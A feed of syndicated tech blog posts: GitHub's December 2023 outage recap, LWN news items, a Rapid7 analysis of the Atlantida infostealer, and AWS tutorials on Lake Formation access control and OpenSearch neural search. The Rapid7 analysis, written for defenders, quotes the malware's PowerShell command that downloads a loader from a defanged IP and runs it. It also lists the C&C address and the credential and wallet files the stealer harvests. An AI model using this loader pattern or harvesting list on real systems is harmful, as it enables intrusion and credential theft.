This resulted in all codespace creations failing between 02:30 and 04:00 UTC on December 27 and approximately 15% of resumes to fail as well as other background functions. We temporarily re-enabled the key in Key Vault to mitigate the impact before deploying a change to continue the secret rotation. The original alert turned out to be a separate issue that was not customer-impacting and was fixed immediately after the incident.

Learning from this, the team has improved the existing playbooks for HMAC key rotation and documentation of our Azure Key Vault implementation.

December 28 05:52 UTC (lasting 65 minutes)

Between 5:52 UTC and 6:47 UTC on December 28, certain GitHub email notifications were not sent due to failed authentication between backend services that generate notifications and a subset of our SMTP servers. This primarily impacted CI activity and Gist email notifications.

This was caused by the rotation of authentication credentials between frontend and internal services that resulted in the SMTP servers not being correctly updated with the new credentials. This triggered an alert for one of the two impacted notifications services within minutes of the secret rotation. On-call engineers discovered the incorrect authentication update on the SMTP servers and applied changes to update it, which mitigated the impact.

Repair items have already been completed to update the relevant secrets rotation playbooks and documentation. While the monitor that did fire was sufficient in this case to engage on-call engineers and remediate the incident, we’ve completed an additional repair item to provide earlier alerting across all services moving forward.

December 29 00:34 UTC (lasting 68 minutes)

Users were unable to sign in or sign up for new accounts between 00:34 and 1:42 UTC on December 29. Existing sessions were not impacted.

This was caused by a credential rotation that was not mirrored in our frontend caches, causing the mismatch in behavior between signed in and signed out users. We resolved the incident by deploying the updated credentials to our cache service.

Repair items are underway to improve our monitoring of signed out user experiences and to better manage updates to shared credentials in our systems moving forward.


Please follow our status page for real-time updates on status changes and post-incident recaps. To learn more about what we’re working on, check out the GitHub Engineering Blog.

The post GitHub Availability Report: December 2023 appeared first on The GitHub Blog.

[$] Growing pains for typing in Python

Post Syndicated from jake original https://lwn.net/Articles/958326/

Python’s static-typing feature has come a long way since it was introduced in 2014. Adding type
information to functions has always been—and will remain—optional, but typing
still remains somewhat contentious. There are multiple kinds of
consumers of the information, each with their own needs and
wishes, as well as users of the feature with expectations of their own. That has
led to the formation of a Python typing council
to govern the type system for the language, though, as might be guessed,
there are still grumblings from various quarters.

Whispers of Atlantida: Safeguarding Your Digital Treasure

Post Syndicated from Natalie Zargarov original https://blog.rapid7.com/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/

Whispers of Atlantida: Safeguarding Your Digital Treasure

Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a compromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is loaded.

Atlantida steals a wide range of login information of softwares like Telegram, Steam, several offline cryptocurrency wallets data, browser stored data as well as cryptocurrency wallets browser extension data. It also captures the victim’s screen and collects hardware data.

Whispers of Atlantida: Safeguarding Your Digital Treasure

Technical Analysis

Stage 1 – Delivery

The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:

Whispers of Atlantida: Safeguarding Your Digital Treasure

The decrypted command : “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” irm hxxp://166.1.160[.]10/loader.txt | iex“ .

Stage 2 – Three levels of in-memory loading

The executed PowerShell command downloads and executes a next stage PowerShell script in memory.

Whispers of Atlantida: Safeguarding Your Digital Treasure

The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls DownloadData API function to get a Donut injector. Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe” by using a Remote Thread Injection Technique (aka CreateRemoteThread). This technique works by writing a shellcode into the context of another eligible process and creating a thread for that process to run the payload.

Whispers of Atlantida: Safeguarding Your Digital Treasure
Figure 4 – .Net downloader Main function

Stage 3 – Atlantida Stealer

The Donut injector is used to load a final payload, which in our case is a new Atlantida Stealer. It got its name following the string found in the executable.

Whispers of Atlantida: Safeguarding Your Digital Treasure

First, the Atlantida stealer captures the entire screen by using the combination of GetDC, CreateCompatibleDC,CreateDIBSection, SelectObject and BitBlt API function combination. Next, it checks if a Filezilla (open source FTP software, that allows users to transfer files from a local to a remote computer) recent services file exists. It does that by attempting to open “C:\Users\username\AppData\Roaming\FileZilla\recentservers.xml” if it does, it reads the file. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under the wallet path:

Whispers of Atlantida: Safeguarding Your Digital Treasure

The stealer reads all the files found under the enumerated path.

Next, it collects the victim’s hardware data such as RAM, GPU, CPU and screen resolution. The stealer enumerates the user’s Desktop folder and reads all text files(.txt). It also looks for Binance wallet credentials by enumerating a `C:\Users\Username\AppData\Roaming\Binance` directory and reading all JSON files under it.

Steam (video game digital distribution service) configuration and credentials are also in Atlantida stealer’s interest as we observed it enumerating the Steam configuration directory and searches for the following files:

  1. Ssfn – Steam Sentry File.
  2. Config.vdf – Stream configuration file.
  3. Loginusers.vdf – stores the records of previously logged-in Steam accounts.
Whispers of Atlantida: Safeguarding Your Digital Treasure
Figure 6 – Steam files enumeration

The last thing that Atlantida is harvesting is Telegram data. It collects all the data located in “C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata”.

The stealer now connects to the hard coded C&C server (45.144.232.99). We accessed the hardcoded IP and got to the login page of what we assume is a stealers control panel, which also had an `Atlantida` title.

Whispers of Atlantida: Safeguarding Your Digital Treasure
Figure 7 – Atlantida login page

No data is passed to the C&C server this time and the stealer continues its collection. Differently from other stealers, Atlantida focuses only on three web browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards and autofills.

One of the notable functions of Atlantida stealer is its ability to steal data from Chrome-based browser extensions. For each Chrome-based extension, an “Extension ID” is given. The malware uses this information to harvest data stored within. Atlantida harvests data from the following cryptocurrency wallets extensions:

Whispers of Atlantida: Safeguarding Your Digital Treasure
Whispers of Atlantida: Safeguarding Your Digital Treasure
Whispers of Atlantida: Safeguarding Your Digital Treasure

When the stealer finishes the collection, all data is compressed and sent to the C&C server. Then the malware exists.

Rapid7 Customers

For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:

  • Suspicious Process – MSHTA Spawns PowerShell

MITRE ATT&CK Techniques:

Whispers of Atlantida: Safeguarding Your Digital Treasure
Whispers of Atlantida: Safeguarding Your Digital Treasure

IOCs

Whispers of Atlantida: Safeguarding Your Digital Treasure

Please welcome Daroc Alden

Post Syndicated from corbet original https://lwn.net/Articles/958444/

When, at the beginning of November, we posted an open position at LWN, we were only so
hopeful; experience has shown that finding writers who are both capable of
and interested in writing our sort of material is a challenging task. This
time, though, hope was justified: we got a surprising number of
applications from highly qualified applicants. The hardest part of the
task has, instead, been narrowing down the choice to a hiring decision.

We are pleased to announce that Daroc Alden has just joined LWN’s staff.

Daroc is a programmer from New England, where they live with their
spouse and their cat. They graduated with a Master’s degree in Computer
Science from the University of New Hampshire. In their spare time, they
enjoy fiction writing and musicals. They are especially interested in
programming language theory and implementation.

Daroc will be taking on some of the load of keeping LWN interesting while
helping us to expand our content mix in the areas that our readers are
interested in. Please give them your support as they come up to speed
within our operation. We are looking forward to having Daroc as part of a
reinforced and more energetic LWN going forward.

Kicinski: netdev in 2023

Post Syndicated from corbet original https://lwn.net/Articles/958518/

Networking maintainer Jakub Kicinski (along with several collaborators) has
put up a summary of
what happened in the kernel’s network stack
during 2023.

Throughout those releases netdev patch handlers (DaveM, Jakub,
Paolo) applied 7243 patches, and the resulting pull requests to
Linus described the changes in 6398 words. Given the volume of work
we cannot go over every improvement, or even cover networking
sub-trees in much detail (BPF enhancements… wireless work on WiFi
7…). We instead try to focus on major themes, and developments we
subjectively find interesting.

Enforce fine-grained access control on Open Table Formats via Amazon EMR integrated with AWS Lake Formation

Post Syndicated from Raymond Lai original https://aws.amazon.com/blogs/big-data/enforce-fine-grained-access-control-on-open-table-formats-via-amazon-emr-integrated-with-aws-lake-formation/

With Amazon EMR 6.15, we launched AWS Lake Formation based fine-grained access controls (FGAC) on Open Table Formats (OTFs), including Apache Hudi, Apache Iceberg, and Delta lake. This allows you to simplify security and governance over transactional data lakes by providing access controls at table-, column-, and row-level permissions with your Apache Spark jobs. Many large enterprise companies seek to use their transactional data lake to gain insights and improve decision-making. You can build a lake house architecture using Amazon EMR integrated with Lake Formation for FGAC. This combination of services allows you to conduct data analysis on your transactional data lake while ensuring secure and controlled access.

The Amazon EMR record server component supports table-, column-, row-, cell-, and nested attribute-level data filtering functionality. It extends support to Hive, Apache Hudi, Apache Iceberg, and Delta lake formats for both reading (including time travel and incremental query) and write operations (on DML statements such as INSERT). Additionally, with version 6.15, Amazon EMR introduces access control protection for its application web interface such as on-cluster Spark History Server, Yarn Timeline Server, and Yarn Resource Manager UI.

In this post, we demonstrate how to implement FGAC on Apache Hudi tables using Amazon EMR integrated with Lake Formation.

Transaction data lake use case

Amazon EMR customers often use Open Table Formats to support their ACID transaction and time travel needs in a data lake. By preserving historical versions, data lake time travel provides benefits such as auditing and compliance, data recovery and rollback, reproducible analysis, and data exploration at different points in time.

Another popular transaction data lake use case is incremental query. Incremental query refers to a query strategy that focuses on processing and analyzing only the new or updated data within a data lake since the last query. The key idea behind incremental queries is to use metadata or change tracking mechanisms to identify the new or modified data since the last query. By identifying these changes, the query engine can optimize the query to process only the relevant data, significantly reducing the processing time and resource requirements.

Solution overview

In this post, we demonstrate how to implement FGAC on Apache Hudi tables using Amazon EMR on Amazon Elastic Compute Cloud (Amazon EC2) integrated with Lake Formation. Apache Hudi is an open source transactional data lake framework that greatly simplifies incremental data processing and the development of data pipelines. This new FGAC feature supports all OTF. Besides demonstrating with Hudi here, we will follow up with other OTF tables with other blogs. We use notebooks in Amazon SageMaker Studio to read and write Hudi data via different user access permissions through an EMR cluster. This reflects real-world data access scenarios—for example, if an engineering user needs full data access to troubleshoot on a data platform, whereas data analysts may only need to access a subset of that data that doesn’t contain personally identifiable information (PII). Integrating with Lake Formation via the Amazon EMR runtime role further enables you to improve your data security posture and simplifies data control management for Amazon EMR workloads. This solution ensures a secure and controlled environment for data access, meeting the diverse needs and security requirements of different users and roles in an organization.

The following diagram illustrates the solution architecture.

Solution architecture

We conduct a data ingestion process to upsert (update and insert) a Hudi dataset to an Amazon Simple Storage Service (Amazon S3) bucket, and persist or update the table schema in the AWS Glue Data Catalog. With zero data movement, we can query the Hudi table governed by Lake Formation via various AWS services, such as Amazon Athena, Amazon EMR, and Amazon SageMaker.

When users submit a Spark job through any EMR cluster endpoints (EMR Steps, Livy, EMR Studio, and SageMaker), Lake Formation validates their privileges and instructs the EMR cluster to filter out sensitive data such as PII data.

This solution has three different types of users with different levels of permissions to access the Hudi data:

  • hudi-db-creator-role – This is used by the data lake administrator who has privileges to carry out DDL operations such as creating, modifying, and deleting database objects. They can define data filtering rules on Lake Formation for row-level and column-level data access control. These FGAC rules ensure that data lake is secured and fulfills the data privacy regulations required.
  • hudi-table-pii-role – This is used by engineering users. The engineering users are capable of carrying out time travel and incremental queries on both Copy-on-Write (CoW) and Merge-on-Read (MoR). They also have privilege to access PII data based on any timestamps.
  • hudi-table-non-pii-role – This is used by data analysts. Data analysts’ data access rights are governed by FGAC authorized rules controlled by data lake administrators. They do not have visibility on columns containing PII data like names and addresses. Additionally, they can’t access rows of data that don’t fulfill certain conditions. For example, the users only can access data rows that belong to their country.

Prerequisites

You can download the three notebooks used in this post from the GitHub repo.

Before you deploy the solution, make sure you have the following:

Complete the following steps to set up your permissions:

  1. Log in to your AWS account with your admin IAM user.

Make sure you are in theus-east-1Region.

  1. Create a S3 bucket in the us-east-1 Region (for example,emr-fgac-hudi-us-east-1-<ACCOUNT ID>).

Next, we enable Lake Formation by changing the default permission model.

  1. Sign in to the Lake Formation console as the administrator user.
  2. Choose Data Catalog settings under Administration in the navigation pane.
  3. Under Default permissions for newly created databases and tables, deselect Use only IAM access control for new databases and Use only IAM access control for new tables in new databases.
  4. Choose Save.

Data Catalog settings

Alternatively, you need to revoke IAMAllowedPrincipals on resources (databases and tables) created if you started Lake Formation with the default option.

Finally, we create a key pair for Amazon EMR.

  1. On the Amazon EC2 console, choose Key pairs in the navigation pane.
  2. Choose Create key pair.
  3. For Name, enter a name (for exampleemr-fgac-hudi-keypair).
  4. Choose Create key pair.

Create key pair

The generated key pair (for this post, emr-fgac-hudi-keypair.pem) will save to your local computer.

Next, we create an AWS Cloud9 interactive development environment (IDE).

  1. On the AWS Cloud9 console, choose Environments in the navigation pane.
  2. Choose Create environment.
  3. For Name¸ enter a name (for example,emr-fgac-hudi-env).
  4. Keep the other settings as default.

Cloud9 environment

  1. Choose Create.
  2. When the IDE is ready, choose Open to open it.

cloud9 environment

  1. In the AWS Cloud9 IDE, on the File menu, choose Upload Local Files.

Upload local file

  1. Upload the key pair file (emr-fgac-hudi-keypair.pem).
  2. Choose the plus sign and choose New Terminal.

new terminal

  1. In the terminal, input the following command lines:
#Create encryption certificates for EMR in transit encryption
openssl req -x509 \
-newkey rsa:1024 \
-keyout privateKey.pem \
-out certificateChain.pem \
-days 365 \
-nodes \
-subj '/C=US/ST=Washington/L=Seattle/O=MyOrg/OU=MyDept/CN=*.compute.internal'
cp certificateChain.pem trustedCertificates.pem

# Zip certificates
zip -r -X my-certs.zip certificateChain.pem privateKey.pem trustedCertificates.pem

# Upload the certificates zip file to S3 bucket
# Replace <ACCOUNT ID> with your AWS account ID
aws s3 cp ./my-certs.zip s3://emr-fgac-hudi-us-east-1-<ACCOUNT ID>/my-certs.zip

Note that the example code is a proof of concept for demonstration purposes only. For production systems, use a trusted certification authority (CA) to issue certificates. Refer to Providing certificates for encrypting data in transit with Amazon EMR encryption for details.

Deploy the solution via AWS CloudFormation

We provide an AWS CloudFormation template that automatically sets up the following services and components:

  • An S3 bucket for the data lake. It contains the sample TPC-DS dataset.
  • An EMR cluster with security configuration and public DNS enabled.
  • EMR runtime IAM roles with Lake Formation fine-grained permissions:
    • <STACK-NAME>-hudi-db-creator-role – This role is used to create Apache Hudi database and tables.
    • <STACK-NAME>-hudi-table-pii-role – This role provides permission to query all columns of Hudi tables, including columns with PII.
    • <STACK-NAME>-hudi-table-non-pii-role – This role provides permission to query Hudi tables that have filtered out PII columns by Lake Formation.
  • SageMaker Studio execution roles that allow the users to assume their corresponding EMR runtime roles.
  • Networking resources such as VPC, subnets, and security groups.

Complete the following steps to deploy the resources:

  1. Choose Quick create stack to launch the CloudFormation stack.
  2. For Stack name, enter a stack name (for example,rsv2-emr-hudi-blog).
  3. For Ec2KeyPair, enter the name of your key pair.
  4. For IdleTimeout, enter an idle timeout for the EMR cluster to avoid paying for the cluster when it’s not being used.
  5. For InitS3Bucket, enter the S3 bucket name you created to save the Amazon EMR encryption certificate .zip file.
  6. For S3CertsZip, enter the S3 URI of the Amazon EMR encryption certificate .zip file.

CloudFormation template

  1. Select I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  2. Choose Create stack.

The CloudFormation stack deployment takes around 10 minutes.

Set up Lake Formation for Amazon EMR integration

Complete the following steps to set up Lake Formation:

  1. On the Lake Formation console, choose Application integration settings under Administration in the navigation pane.
  2. Select Allow external engines to filter data in Amazon S3 locations registered with Lake Formation.
  3. Choose Amazon EMR for Session tag values.
  4. Enter your AWS account ID for AWS account IDs.
  5. Choose Save.

LF - Application integration settings

  1. Choose Databases under Data Catalog in the navigation pane.
  2. Choose Create database.
  3. For Name, enter default.
  4. Choose Create database.

LF - create database

  1. Choose Data lake permissions under Permissions in the navigation pane.
  2. Choose Grant.
  3. Select IAM users and roles.
  4. Choose your IAM roles.
  5. For Databases, choose default.
  6. For Database permissions, select Describe.
  7. Choose Grant.

LF - Grant data permissions

Copy Hudi JAR file to Amazon EMR HDFS

To use Hudi with Jupyter notebooks, you need to complete the following steps for the EMR cluster, which includes copying a Hudi JAR file from the Amazon EMR local directory to its HDFS storage, so that you can configure a Spark session to use Hudi:

  1. Authorize inbound SSH traffic (port 22).
  2. Copy the value for Primary node public DNS (for example, ec2-XXX-XXX-XXX-XXX.compute-1.amazonaws.com) from the EMR cluster Summary section.

EMR cluster summary

  1. Go back to previous AWS Cloud9 terminal you used to create the EC2 key pair.
  2. Run the following command to SSH into the EMR primary node. Replace the placeholder with your EMR DNS hostname:
chmod 400 emr-fgac-hudi-keypair.pem
ssh -i emr-fgac-hudi-keypair.pem [email protected]
  1. Run the following command to copy the Hudi JAR file to HDFS:
hdfs dfs -mkdir -p /apps/hudi/lib
hdfs dfs -copyFromLocal /usr/lib/hudi/hudi-spark-bundle.jar /apps/hudi/lib/hudi-spark-bundle.jar

Create the Hudi database and tables in Lake Formation

Now we’re ready to create the Hudi database and tables with FGAC enabled by the EMR runtime role. The EMR runtime role is an IAM role that you can specify when you submit a job or query to an EMR cluster.

Grant database creator permission

First, let’s grant the Lake Formation database creator permission to<STACK-NAME>-hudi-db-creator-role:

  1. Log in to your AWS account as an administrator.
  2. On the Lake Formation console, choose Administrative roles and tasks under Administration in the navigation pane.
  3. Confirm that your AWS login user has been added as a data lake administrator.
  4. In the Database creator section, choose Grant.
  5. For IAM users and roles, choose<STACK-NAME>-hudi-db-creator-role.
  6. For Catalog permissions, select Create database.
  7. Choose Grant.

Register the data lake location

Next, let’s register the S3 data lake location in Lake Formation:

  1. On the Lake Formation console, choose Data lake locations under Administration in the navigation pane.
  2. Choose Register location.
  3. For Amazon S3 path, Choose Browse and choose the data lake S3 bucket. (<STACK_NAME>s3bucket-XXXXXXX) created from the CloudFormation stack.
  4. For IAM role, choose<STACK-NAME>-hudi-db-creator-role.
  5. For Permission mode, select Lake Formation.
  6. Choose Register location.

LF - Register location

Grant data location permission

Next, we need to grant<STACK-NAME>-hudi-db-creator-rolethe data location permission:

  1. On the Lake Formation console, choose Data locations under Permissions in the navigation pane.
  2. Choose Grant.
  3. For IAM users and roles, choose<STACK-NAME>-hudi-db-creator-role.
  4. For Storage locations, enter the S3 bucket (<STACK_NAME>-s3bucket-XXXXXXX).
  5. Choose Grant.

LF - Grant permissions

Connect to the EMR cluster

Now, let’s use a Jupyter notebook in SageMaker Studio to connect to the EMR cluster with the database creator EMR runtime role:

  1. On the SageMaker console, choose Domains in the navigation pane.
  2. Choose the domain<STACK-NAME>-Studio-EMR-LF-Hudi.
  3. On the Launch menu next to the user profile<STACK-NAME>-hudi-db-creator, choose Studio.

SM - Domain details

  1. Download the notebook rsv2-hudi-db-creator-notebook.
  2. Choose the upload icon.

SM Studio - Upload

  1. Choose the downloaded Jupyter notebook and choose Open.
  2. Open the uploaded notebook.
  3. For Image, choose SparkMagic.
  4. For Kernel, choose PySpark.
  5. Leave the other configurations as default and choose Select.

SM Studio - Change environment

  1. Choose Cluster to connect to the EMR cluster.

SM Studio - connect EMR cluster

  1. Choose the EMR on EC2 cluster (<STACK-NAME>-EMR-Cluster) created with the CloudFormation stack.
  2. Choose Connect.
  3. For EMR execution role, choose<STACK-NAME>-hudi-db-creator-role.
  4. Choose Connect.

Create database and tables

Now you can follow the steps in the notebook to create the Hudi database and tables. The major steps are as follows:

  1. When you start the notebook, configure“spark.sql.catalog.spark_catalog.lf.managed":"true"to inform Spark that spark_catalog is protected by Lake Formation.
  2. Create Hudi tables using the following Spark SQL.
%%sql 
CREATE TABLE IF NOT EXISTS ${hudi_catalog}.${hudi_db}.${cow_table_name_sql}(
    c_customer_id string,
    c_birth_country string,
    c_customer_sk integer,
    c_email_address string,
    c_first_name string,
    c_last_name string,
    ts bigint
) USING hudi
LOCATION '${cow_table_location_sql}'
OPTIONS (
  type = 'cow',
  primaryKey = '${hudi_primary_key}',
  preCombineField = '${hudi_pre_combined_field}'
 ) 
PARTITIONED BY (${hudi_partitioin_field});

  1. Insert data from the source table to the Hudi tables.
%%sql
INSERT OVERWRITE ${hudi_catalog}.${hudi_db}.${cow_table_name_sql}
SELECT 
    c_customer_id ,  
    c_customer_sk,
    c_email_address,
    c_first_name,
    c_last_name,
    unix_timestamp(current_timestamp()) AS ts,
    c_birth_country
FROM ${src_df_view}
WHERE c_birth_country = 'HONG KONG' OR c_birth_country = 'CHINA' 
LIMIT 1000
  1. Insert data again into the Hudi tables.
%%sql
INSERT INTO ${hudi_catalog}.${hudi_db}.${cow_table_name_sql}
SELECT 
    c_customer_id ,  
    c_customer_sk,
    c_email_address,
    c_first_name,
    c_last_name,
    unix_timestamp(current_timestamp()) AS ts,
    c_birth_country
FROM ${insert_into_view}

Query the Hudi tables via Lake Formation with FGAC

After you create the Hudi database and tables, you’re ready to query the tables using fine-grained access control with Lake Formation. We have created two types of Hudi tables: Copy-On-Write (COW) and Merge-On-Read (MOR). The COW table stores data in a columnar format (Parquet), and each update creates a new version of files during a write. This means that for every update, Hudi rewrites the entire file, which can be more resource-intensive but provides faster read performance. MOR, on the other hand, is introduced for cases where COW may not be optimal, particularly for write- or change-heavy workloads. In a MOR table, each time there is an update, Hudi writes only the row for the changed record, which reduces cost and enables low-latency writes. However, the read performance might be slower compared to COW tables.

Grant table access permission

We use the IAM role<STACK-NAME>-hudi-table-pii-roleto query Hudi COW and MOR containing PII columns. We first grant the table access permission via Lake Formation:

  1. On the Lake Formation console, choose Data lake permissions under Permissions in the navigation pane.
  2. Choose Grant.
  3. Choose<STACK-NAME>-hudi-table-pii-rolefor IAM users and roles.
  4. Choose thersv2_blog_hudi_db_1database for Databases.
  5. For Tables, choose the four Hudi tables you created in the Jupyter notebook.

LF - Grant data permissions

  1. For Table permissions, select Select.
  2. Choose Grant.

LF - table permissions

Query PII columns

Now you’re ready to run the notebook to query the Hudi tables. Let’s follow similar steps to the previous section to run the notebook in SageMaker Studio:

  1. On the SageMaker console, navigate to the<STACK-NAME>-Studio-EMR-LF-Hudidomain.
  2. On the Launch menu next to the<STACK-NAME>-hudi-table-readeruser profile, choose Studio.
  3. Upload the downloaded notebook rsv2-hudi-table-pii-reader-notebook.
  4. Open the uploaded notebook.
  5. Repeat the notebook setup steps and connect to the same EMR cluster, but use the role<STACK-NAME>-hudi-table-pii-role.

In the current stage, FGAC-enabled EMR cluster needs to query Hudi’s commit time column for performing incremental queries and time travel. It does not support Spark’s “timestamp as of” syntax and Spark.read(). We are actively working on incorporating support for both actions in future Amazon EMR releases with FGAC enabled.

You can now follow the steps in the notebook. The following are some highlighted steps:

  1. Run a snapshot query.
%%sql 
SELECT c_birth_country, count(*) FROM ${hudi_catalog}.${hudi_db}.${cow_table_name_sql} GROUP BY c_birth_country;
  1. Run an incremental query.
incremental_df = spark.sql(f"""
SELECT * FROM {HUDI_CATALOG}.{HUDI_DATABASE}.{COW_TABLE_NAME_SQL} WHERE _hoodie_commit_time >= {commit_ts[-1]}
""")

incremental_df.createOrReplaceTempView("incremental_view")
%%sql
SELECT 
    c_birth_country, 
    count(*) 
FROM incremental_view
GROUP BY c_birth_country;
  1. Run a time travel query.
%%sql
SELECT
    c_birth_country, COUNT(*) as count
FROM ${hudi_catalog}.${hudi_db}.${cow_table_name_sql}
WHERE _hoodie_commit_time IN
(
    SELECT DISTINCT _hoodie_commit_time FROM ${hudi_catalog}.${hudi_db}.${cow_table_name_sql} ORDER BY _hoodie_commit_time LIMIT 1 
)
GROUP BY c_birth_country
  1. Run MOR read-optimized and real-time table queries.
%%sql
SELECT
    a.email_label,
    count(*)
FROM (
    SELECT
        CASE
            WHEN c_email_address = 'UNKNOWN' THEN 'UNKNOWN'
            ELSE 'NOT_UNKNOWN'
        END AS email_label
    FROM ${hudi_catalog}.${hudi_db}.${mor_table_name_sql}_ro
    WHERE c_birth_country = 'HONG KONG'
) a
GROUP BY a.email_label;
%%sql
SELECT *  
FROM ${hudi_catalog}.${hudi_db}.${mor_table_name_sql}_ro
WHERE 
    c_birth_country = 'INDIA' OR c_first_name = 'MASKED'

Query the Hudi tables with column-level and row-level data filters

We use the IAM role<STACK-NAME>-hudi-table-non-pii-roleto query Hudi tables. This role is not allowed to query any columns containing PII. We use the Lake Formation column-level and row-level data filters to implement fine-grained access control:

  1. On the Lake Formation console, choose Data filters under Data Catalog in the navigation pane.
  2. Choose Create new filter.
  3. For Data filter name, entercustomer-pii-filter.
  4. Choosersv2_blog_hudi_db_1for Target database.
  5. Choosersv2_blog_hudi_mor_sql_dl_customer_1for Target table.
  6. Select Exclude columns and choose thec_customer_id,c_email_address, andc_last_namecolumns.
  7. Enterc_birth_country != 'HONG KONG'for Row filter expression.
  8. Choose Create filter.

LF - create data filter

  1. Choose Data lake permissions under Permissions in the navigation pane.
  2. Choose Grant.
  3. Choose<STACK-NAME>-hudi-table-non-pii-rolefor IAM users and roles.
  4. Choosersv2_blog_hudi_db_1for Databases.
  5. Choosersv2_blog_hudi_mor_sql_dl_tpc_customer_1for Tables.
  6. Choosecustomer-pii-filterfor Data filters.
  7. For Data filter permissions, select Select.
  8. Choose Grant.

LF - Grant data permissions

Let’s follow similar steps to run the notebook in SageMaker Studio:

  1. On the SageMaker console, navigate to the domainStudio-EMR-LF-Hudi.
  2. On the Launch menu for thehudi-table-readeruser profile, choose Studio.
  3. Upload the downloaded notebook rsv2-hudi-table-non-pii-reader-notebook and choose Open.
  4. Repeat the notebook setup steps and connect to the same EMR cluster, but select the role<STACK-NAME>-hudi-table-non-pii-role.

You can now follow the steps in the notebook. From the query results, you can see that FGAC via the Lake Formation data filter has been applied. The role can’t see the PII columnsc_customer_id,c_last_name, andc_email_address. Also, the rows fromHONG KONGhave been filtered.

filtered query result

Clean up

After you’re done experimenting with the solution, we recommend cleaning up resources with the following steps to avoid unexpected costs:

  1. Shut down the SageMaker Studio apps for the user profiles.

The EMR cluster will be automatically deleted after the idle timeout value.

  1. Delete the Amazon Elastic File System (Amazon EFS) volume created for the domain.
  2. Empty the S3 buckets created by the CloudFormation stack.
  3. On the AWS CloudFormation console, delete the stack.

Conclusion

In this post, we used Apachi Hudi, one type of OTF tables, to demonstrate this new feature to enforce fine-grained access control on Amazon EMR. You can define granular permissions in Lake Formation for OTF tables and apply them via Spark SQL queries on EMR clusters. You also can use transactional data lake features such as running snapshot queries, incremental queries, time travel, and DML query. Please note that this new feature covers all OTF tables.

This feature is launched starting from Amazon EMR release 6.15 in all Regions where Amazon EMR is available. With the Amazon EMR integration with Lake Formation, you can confidently manage and process big data, unlocking insights and facilitating informed decision-making while upholding data security and governance.

To learn more, refer to Enable Lake Formation with Amazon EMR and feel free to contact your AWS Solutions Architects, who can be of assistance alongside your data journey.


About the Author

Raymond LaiRaymond Lai is a Senior Solutions Architect who specializes in catering to the needs of large enterprise customers. His expertise lies in assisting customers with migrating intricate enterprise systems and databases to AWS, constructing enterprise data warehousing and data lake platforms. Raymond excels in identifying and designing solutions for AI/ML use cases, and he has a particular focus on AWS Serverless solutions and Event Driven Architecture design.

Bin Wang, PhD, is a Senior Analytic Specialist Solutions Architect at AWS, boasting over 12 years of experience in the ML industry, with a particular focus on advertising. He possesses expertise in natural language processing (NLP), recommender systems, diverse ML algorithms, and ML operations. He is deeply passionate about applying ML/DL and big data techniques to solve real-world problems.

Aditya Shah is a Software Development Engineer at AWS. He is interested in Databases and Data warehouse engines and has worked on performance optimisations, security compliance and ACID compliance for engines like Apache Hive and Apache Spark.

Melody Yang is a Senior Big Data Solution Architect for Amazon EMR at AWS. She is an experienced analytics leader working with AWS customers to provide best practice guidance and technical advice in order to assist their success in data transformation. Her areas of interests are open-source frameworks and automation, data engineering and DataOps.

Power neural search with AI/ML connectors in Amazon OpenSearch Service

Post Syndicated from Aruna Govindaraju original https://aws.amazon.com/blogs/big-data/power-neural-search-with-ai-ml-connectors-in-amazon-opensearch-service/

With the launch of the neural search feature for Amazon OpenSearch Service in OpenSearch 2.9, it’s now effortless to integrate with AI/ML models to power semantic search and other use cases. OpenSearch Service has supported both lexical and vector search since the introduction of its k-nearest neighbor (k-NN) feature in 2020; however, configuring semantic search required building a framework to integrate machine learning (ML) models to ingest and search. The neural search feature facilitates text-to-vector transformation during ingestion and search. When you use a neural query during search, the query is translated into a vector embedding and k-NN is used to return the nearest vector embeddings from the corpus.

To use neural search, you must set up an ML model. We recommend configuring AI/ML connectors to AWS AI and ML services (such as Amazon SageMaker or Amazon Bedrock) or third-party alternatives. Starting with version 2.9 on OpenSearch Service, AI/ML connectors integrate with neural search to simplify and operationalize the translation of your data corpus and queries to vector embeddings, thereby removing much of the complexity of vector hydration and search.

In this post, we demonstrate how to configure AI/ML connectors to external models through the OpenSearch Service console.

Solution Overview

Specifically, this post walks you through connecting to a model in SageMaker. Then we guide you through using the connector to configure semantic search on OpenSearch Service as an example of a use case that is supported through connection to an ML model. Amazon Bedrock and SageMaker integrations are currently supported on the OpenSearch Service console UI, and the list of UI-supported first- and third-party integrations will continue to grow.

For any models not supported through the UI, you can instead set them up using the available APIs and the ML blueprints. For more information, refer to Introduction to OpenSearch Models. You can find blueprints for each connector in the ML Commons GitHub repository.

Prerequisites

Before connecting the model via the OpenSearch Service console, create an OpenSearch Service domain. Map an AWS Identity and Access Management (IAM) role by the name LambdaInvokeOpenSearchMLCommonsRole as the backend role on the ml_full_access role using the Security plugin on OpenSearch Dashboards, as shown in the following video. The OpenSearch Service integrations workflow is pre-filled to use the LambdaInvokeOpenSearchMLCommonsRole IAM role by default to create the connector between the OpenSearch Service domain and the model deployed on SageMaker. If you use a custom IAM role on the OpenSearch Service console integrations, make sure the custom role is mapped as the backend role with ml_full_access permissions prior to deploying the template.

Deploy the model using AWS CloudFormation

The following video demonstrates the steps to use the OpenSearch Service console to deploy a model within minutes on Amazon SageMaker and generate the model ID via the AI connectors. The first step is to choose Integrations in the navigation pane on the OpenSearch Service AWS console, which routes to a list of available integrations. The integration is set up through a UI, which will prompt you for the necessary inputs.

To set up the integration, you only need to provide the OpenSearch Service domain endpoint and provide a model name to uniquely identify the model connection. By default, the template deploys the Hugging Face sentence-transformers model, djl://ai.djl.huggingface.pytorch/sentence-transformers/all-MiniLM-L6-v2.

